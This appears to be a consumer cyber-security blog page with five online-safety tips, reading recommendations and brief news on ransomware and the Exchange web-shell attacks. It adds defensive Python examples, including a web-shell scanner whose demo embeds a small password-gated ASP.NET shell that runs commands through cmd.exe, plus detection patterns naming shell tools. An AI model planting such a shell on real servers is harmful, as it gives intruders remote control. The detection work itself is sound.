How to protect yourself online

In a time when companies, celebrities, and even governments are frequently coming under cyber-attack, getting hacked might seem inevitable. The good news, however, is that you can do something to protect yourself, your family, and your work by following just 5 essential cyber tips.

These tips go a long way to stopping hackers like those seen in Mr Robot in their tracks.

So what’s the relevance of Mr Robot to hacking and cyber attacks? The popular TV series “Mr. Robot” is probably one of the most accurate portrayals of what hackers actually do in real life, and of some of the techniques they use.

So if you want to get more streetwise, it’s an entertaining way of educating yourself about hackers and their tricks. If you’re interested in hacking and don’t understand a lot of this, the show employs real hackers to work on it and depict attacks that could genuinely happen, and it’s a very accurate portrayal of what we see today: from hacking smartphones to getting access to a big corporation and bringing it to its knees from a cyber perspective.

So let’s reveal 5 important things you can do to make yourself much more secure, both at home and at work, and beat those hoodied hackers:

1. Use two-factor authentication (aka two-step, 2FA, multi-factor) everywhere that you can

The majority of modern banking platforms, email providers, Twitter, Facebook etc. let you enable multi-factor / two-factor authentication. So even if your username and password are exposed to hackers (believe me, it happens) you are still protected by an additional factor.

What you may not know is that most cyber criminals also know how to take over your mobile phone number, so that they receive your SMS multi-factor code instead of you and get around SMS-based multi-factor. Attackers can port or SIM-swap your mobile service by social-engineering your carrier, which is why, where possible, you should always use an app-based second factor rather than SMS, e.g. Microsoft Authenticator, Google Authenticator, Authy etc. The app generates the code on your device from a secret shared at enrolment, so there is nothing to intercept on the phone network. Bear in mind that a code you type into a fake login page can still be passed straight on to the real site, so the app protects the code, not you, from phishing; a hardware security key is the stronger option where a site supports one.

2. Don’t use the same password everywhere

I know it’s hard, but using the same password everywhere is probably one of the easiest ways we break in as hackers. If you re-use the same password across LinkedIn, Dropbox and your cloud-based email, we can find it in breach data on the dark net, log in to your email, and reset the passwords on your other accounts from there.

If you think I’m making it up, check your personal email addresses on a breach-notification service and see whether your passwords are already in the hands of hackers. Identity takeover is then easy: hackers can take out loans, credit cards, mortgages etc. using your identity.

Consider using a password manager across all of your devices, so that you only use long, unique passwords that your password manager remembers rather than you. Enable multi-factor on your password manager too.
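As an added example (not from the original page), the following shows how a breach check can be done without ever sending your password anywhere, using the k-anonymity scheme of the Pwned Passwords range API: only the first five hex characters of the password's SHA-1 are sent, the service returns every known suffix for that prefix, and the match is made locally. The response body below is constructed for the example (the counts and the other suffixes are made up); the real service answers at https://api.pwnedpasswords.com/range/<prefix>. The last function does what a password manager does when it generates a replacement.

```python
import hashlib
import secrets
import string

PASSWORD_ALPHABET = string.ascii_letters + string.digits + string.punctuation


def sha1_prefix_suffix(password: str):
    """Split the upper-case hex SHA-1 of the password into the 5-character prefix
    that is sent to the lookup service and the 35-character suffix that stays local."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def pwned_count(password: str, range_response: str) -> int:
    """How many times the password appears in breach data, given the text body the
    range API returns for GET /range/<prefix>: one 'SUFFIX:COUNT' line per known
    hash sharing that prefix. Returns 0 when the password is not in the list."""
    _, suffix = sha1_prefix_suffix(password)
    for line in range_response.splitlines():
        if ":" not in line:
            continue
        candidate, count = line.strip().split(":", 1)
        if candidate.upper() == suffix:
            return int(count)
    return 0


# Constructed stand-in for the response for prefix 5BAA6 (SHA-1 of "password" is
# 5BAA61E4C9B9...). Only the middle suffix is real; the other suffixes and all of
# the counts are made up. A real response has several hundred lines.
SAMPLE_RANGE_5BAA6 = """\
0003C0D7E5B2D2F1A0C8B3E3B4C1E6A8F3A:3
1E4C9B93F3F0682250B6CF8331B7EE68FD8:9545824
FA6D2F18A8E3C5D4B1A9C0E7F2B3D4C5E6F:1
"""


def generate_password(length: int = 20) -> str:
    """What a password manager does for you: a long, unique password drawn from a
    cryptographically secure RNG (`secrets`), not from anything memorable."""
    return "".join(secrets.choice(PASSWORD_ALPHABET) for _ in range(length))


if __name__ == "__main__":
    prefix, _ = sha1_prefix_suffix("password")
    print("would query range", prefix, "and find the password",
          pwned_count("password", SAMPLE_RANGE_5BAA6), "times")
    print("replacement:", generate_password())
```

To run it for real, fetch the range body over HTTPS with the prefix from sha1_prefix_suffix and pass the text to pwned_count; the full hash, and the password, never leave your machine.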

3. Update update update!

Yep, those pesky security patches. Every time Windows, your phone / tablet or your Apple device says “hey, I need to update!”, it’s usually to fix a known weakness that hackers have figured out how to use against you. So keep up to date to protect yourself, and turn on automatic updates wherever you can. Some people think Apple devices are impenetrable to cyber attack; that’s not the case. They have security weaknesses too, and often need updating. Whether you use Windows or Apple computers it’s the same thing: update your systems.

It’s the same for third-party applications. If you use Java, Adobe products, a PDF viewer or MS Office, keep those up to date too: they are the applications most often targeted through malicious documents, and patching them makes it much harder for hackers to break into your system.

4. Carefully consider the information you share online

Your personal information is incredibly valuable to hackers, so be aware of what information is collected about you and what you share online. As attackers, we can look at the information you share and craft custom phishing attacks against you.

Think what we could do with info such as your personal or professional interests, the events you are attending, your job description and your connections… all shared publicly on Facebook / LinkedIn. We can use that info as a way to attack you.

Be proactive in managing your privacy: check the privacy and security settings on your online accounts and apps, watch out for fake profiles, and don’t connect with people you don’t actually know in real life.

A very common trick hackers use is a customised phishing email. Most hackers these days know how to play on your emotions.

Be it curiosity, urgency, whatever it takes to get you to open an email and click on a malicious link. If you do click that link, hackers might install a keystroke logger or a back door into your system, and from there into the network it is connected to. Before you click, hover over the link and check that the address it actually points to matches the address it shows you; if they differ, or the address is a bare IP number, don’t click.
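The link check just described can be automated over an email body. The following is an added example (not code from the original page) that extracts every link from an HTML email, compares the domain the reader sees with the domain the link really goes to, and flags punycode hosts (lookalike characters) and raw IP addresses. The email body is constructed for the example using reserved example domains; the domain comparison uses the last two labels only, which is a simplification (a real tool would use the public suffix list).

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_domain(host: str) -> str:
    """Crude 'last two labels' domain (no public-suffix list): mail.example.com -> example.com."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


DOMAIN_IN_TEXT = re.compile(r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})")
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def suspicious_links(html_body: str):
    """Return (href, visible_text, reason) for every link whose real target does not
    match what the reader is shown, or whose host no legitimate mailer would use."""
    collector = _LinkCollector()
    collector.feed(html_body)
    findings = []
    for href, text in collector.links:
        host = urlparse(href).hostname or ""
        if any(label.startswith("xn--") for label in host.split(".")):
            findings.append((href, text, "punycode host (possible homograph)"))
        elif IPV4.fullmatch(host):
            findings.append((href, text, "raw IP address as host"))
        else:
            shown = DOMAIN_IN_TEXT.search(text.lower())
            if shown and registrable_domain(shown.group(1)) != registrable_domain(host):
                findings.append((href, text, f"text shows {shown.group(1)} but link goes to {host}"))
    return findings


# Constructed phishing-style email body; all domains are reserved example names.
SAMPLE_EMAIL = """
<p>Dear customer, your account is locked. Reset it within 24 hours:</p>
<p><a href="https://example.com.login-verify.example.net/reset">https://example.com/reset</a></p>
<p>Or sign in directly: <a href="http://xn--exmple-cua.com/">Sign in</a></p>
<p><a href="http://203.0.113.7/login">Click here</a> if the links above fail.</p>
<p>Help centre: <a href="https://example.com/help">example.com/help</a></p>
"""

if __name__ == "__main__":
    for href, text, reason in suspicious_links(SAMPLE_EMAIL):
        print(f"{reason}: [{text}] -> {href}")
```

Note that the first link is the classic trick: the real domain is example.net, with "example.com" placed at the front of the host name so a quick glance reads it as the genuine site. The honest help-centre link is not flagged.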

5. Last but not least, safeguard your personal information.

That’s one of the biggest things attackers can leverage to get access to you and your data: things like your date of birth, TFN (tax file number) or your credit card numbers. As an example, no one from your bank should be calling you and asking for that type of information.

This is a common scam, where the caller pretends to be your bank / financial service, your mobile phone provider, Microsoft, or the ATO. So whenever you get a call asking for personal information, tell them you’ll call them back. Don’t use a number the caller gives you: look up the contact number on the organisation’s website, or on the back of your card, and call that to verify.

That’s it – 5 simple steps that will help protect you against hackers.

Have any more tips, suggestions or feedback? Leave them in the comments below.

Inspiring cyber / privacy books, podcasts, documentaries and websites

I often get asked by friends and colleagues for recommendations on the latest things to read / listen to for all things cyber & privacy, or for interesting & inspiring material to read up on.

I therefore decided it would be useful to share this more broadly, hence this page.

Here are my latest recommendations:

“Darknet Diaries”

Podcast by Jack Rhysider. A mix of very interesting cyber-related stories on a number of current topics. Well put together and easy to listen to:

“Future Crimes”

Book by Marc Goodman. A scary look at the present and future of our everything-connected world. Did you read those terms of service?

“The Great Hack”

An eye-opening documentary, available on Netflix, about Cambridge Analytica, big data, and our future:

“The Dark Net isn’t what you think.” TED Talk

Alex Winter’s (think Bill and Ted) well-known TED talk on the dark web. It makes you realise that there’s a lot more to the dark web than meets the eye:

“Click here to kill everybody” Book

A very interesting read from renowned cyber security guru Bruce Schneier:

“The Cuckoo’s Egg: Tracking a Spy Through the Maze of Computer Espionage” Book

I read this at uni, and literally didn’t put it down until I had finished it cover to cover. One of the main reasons I got into cyber security in the first place!

Cyber News & Update Sites:

A few more handy / interesting cyber / privacy related sites:

Crying Baby Social Engineering

This is a great example of how human manipulation can easily trick someone into doing something they shouldn’t.

A crying baby and a convincing, friendly female voice are sure to get someone doing something they shouldn’t.

This video brings this technique to life!

Marc Goodman – a vision of crimes now, and in the near future

A scary wake-up call looking at the darker underbelly of tech and society…

Group-IB “Ransomware Uncovered 2020 – 2021” Report Published

Cyber security company Group-IB has recently published an eye-opening report on ransomware, revealing that almost two-thirds of the ransomware attacks it analysed during 2020 came from cyber criminals operating on a ransomware-as-a-service (RaaS) model.

The report is well worth a read, and provides insightful details on how gangs operate and info to help cyber defence teams thwart attacks. It also includes some great threat hunting and detection tips.

Such is the demand for ransomware as a service that 15 new ransomware affiliate schemes appeared during 2020, including Thanos, Avaddon, SunCrypt and many others. Competition among ransomware developers can even lead to authors offering special deals to wannabe crooks, which is more bad news for potential victims.

Group-IB’s DFIR team has for the first time mapped the most commonly used TTPs in 2020 in accordance with MITRE ATT&CK®.

Here’s a link to the full report:

#cybersecurity #intelligence #infosec

CISA issues emergency directive following Microsoft Exchange zero-day vulnerability fixes

The US Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive following the release of fixes for zero-day vulnerabilities in Microsoft Exchange. 

On 2 March 2021, Microsoft released emergency security updates to fix four security holes in on-premises Exchange Server versions 2013 through 2019 that hackers were actively exploiting to siphon email from Internet-facing Exchange servers.

In the three days since then, security experts say the Chinese cyber-espionage group Microsoft attributed the original attacks to (tracked by Microsoft as HAFNIUM) has dramatically stepped up attacks on any vulnerable, unpatched Exchange server worldwide. In the majority of incidents the intruders left behind a “web shell”: a small script planted on the server that lets the attacker run commands on it over HTTP from any browser, usually protected by a password so that only they can use it. The web shell gives the attackers administrative access to the Exchange server, and installing the patch does not remove it, so any server that was exposed before it was patched needs to be checked for one.
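As an added example (not from the original article or from Microsoft), the following is the kind of first-pass web shell hunt a responder would run over an IIS web root after patching: it walks the tree, picks out recently modified ASP.NET (and other server-side) files, and flags those that combine a server-side script block, input read from the request, and a call that executes something. The two sample files are constructed for the example; the benign one reads request input too, to show why a single pattern would false-positive. The patterns are heuristics to start a human review, not a verdict, and the web root path is whatever your Exchange install uses.

```python
import re
import tempfile
import time
from pathlib import Path

# Heuristics for ASP.NET web shells. Each alone is common in legitimate pages; a
# file matching all three (server-side code that reads attacker input and hands
# it to something that executes) deserves a human look. Heuristic, not proof.
PATTERNS = {
    "server-side script": re.compile(r'runat\s*=\s*"?server"?', re.I),
    "reads request input": re.compile(
        r'Request\s*(?:\[|\.(?:Form|QueryString|Headers|Cookies|Item)\b)', re.I),
    "executes input": re.compile(
        r'Process\.Start|ProcessStartInfo|Assembly\.Load|JScript\.Eval|\.Invoke\s*\(|cmd\.exe|powershell',
        re.I),
}
WEB_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asax", ".php", ".jsp"}


def classify(source: str) -> list:
    """Names of the heuristics the file content matches, in PATTERNS order."""
    return [name for name, rx in PATTERNS.items() if rx.search(source)]


def scan_webroot(root, max_age_days=None, min_hits=3):
    """Walk `root` (e.g. an IIS web root) and return (path, hits) for web files
    matching at least `min_hits` heuristics. `max_age_days` narrows the search to
    recently modified files, which is where a freshly dropped shell will be."""
    now = time.time()
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTENSIONS:
            continue
        if max_age_days is not None and now - path.stat().st_mtime > max_age_days * 86400:
            continue
        try:
            source = path.read_text(errors="ignore")
        except OSError:
            continue
        hits = classify(source)
        if len(hits) >= min_hits:
            findings.append((str(path), hits))
    return findings


# Constructed samples: a minimal password-gated command shell, and a benign page
# that also reads request input.
SAMPLE_SHELL = '''<%@ Page Language="C#" %>
<script runat="server">
void Page_Load(object s, EventArgs e) {
    if (Request["pw"] != "s3cret") return;
    System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]);
}
</script>'''

SAMPLE_BENIGN = '''<%@ Page Language="C#" %>
<script runat="server">
void Page_Load(object s, EventArgs e) { Greeting.Text = "Hello " + Request["name"]; }
</script>
<asp:Label ID="Greeting" runat="server" />'''


def demo():
    """Write both samples into a temporary web root, scan it, and return the
    flagged file names with the heuristics they tripped."""
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "owa").mkdir()
        (Path(root) / "owa" / "help.aspx").write_text(SAMPLE_SHELL)
        (Path(root) / "default.aspx").write_text(SAMPLE_BENIGN)
        return [(Path(p).name, hits) for p, hits in scan_webroot(root, max_age_days=7)]


if __name__ == "__main__":
    print(demo())
```

In a real investigation, run scan_webroot against each IIS site root with a max_age_days covering the exposure window, and treat every flagged file as evidence to preserve (hash and copy it before touching it) rather than something to simply delete.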

Read more on this incident here:

Luscious LinkedIn Profiles – Please connect with me!?

Have you ever received a LinkedIn invitation from someone you don’t actually know, but accepted it anyway because the profile photo looked ‘interesting’ or ‘attractive’? It’s one of the oldest tricks in the book for getting connected to you and your contacts… would you be upset if I told you that it’s just a social engineering trick?

There are all sorts of people out there who try and connect via LinkedIn using a few different techniques to convince you to connect. Once you are a connection, they can use the information you share for a variety of purposes, both good and bad.

When you receive an invite, stop and think before accepting. Do a Google search on the person and work out whether they are real. Look them up on Instagram or Facebook and see what content you can find. Do a reverse image search on the profile photo and see if it is just a stock photo or has been lifted from someone else’s profile.

Chances are they aren’t real, and it’s a sales technique or a malicious person trying to connect.

Mike Winnet explains this technique really well in one of his vlog videos, so you might enjoy watching below: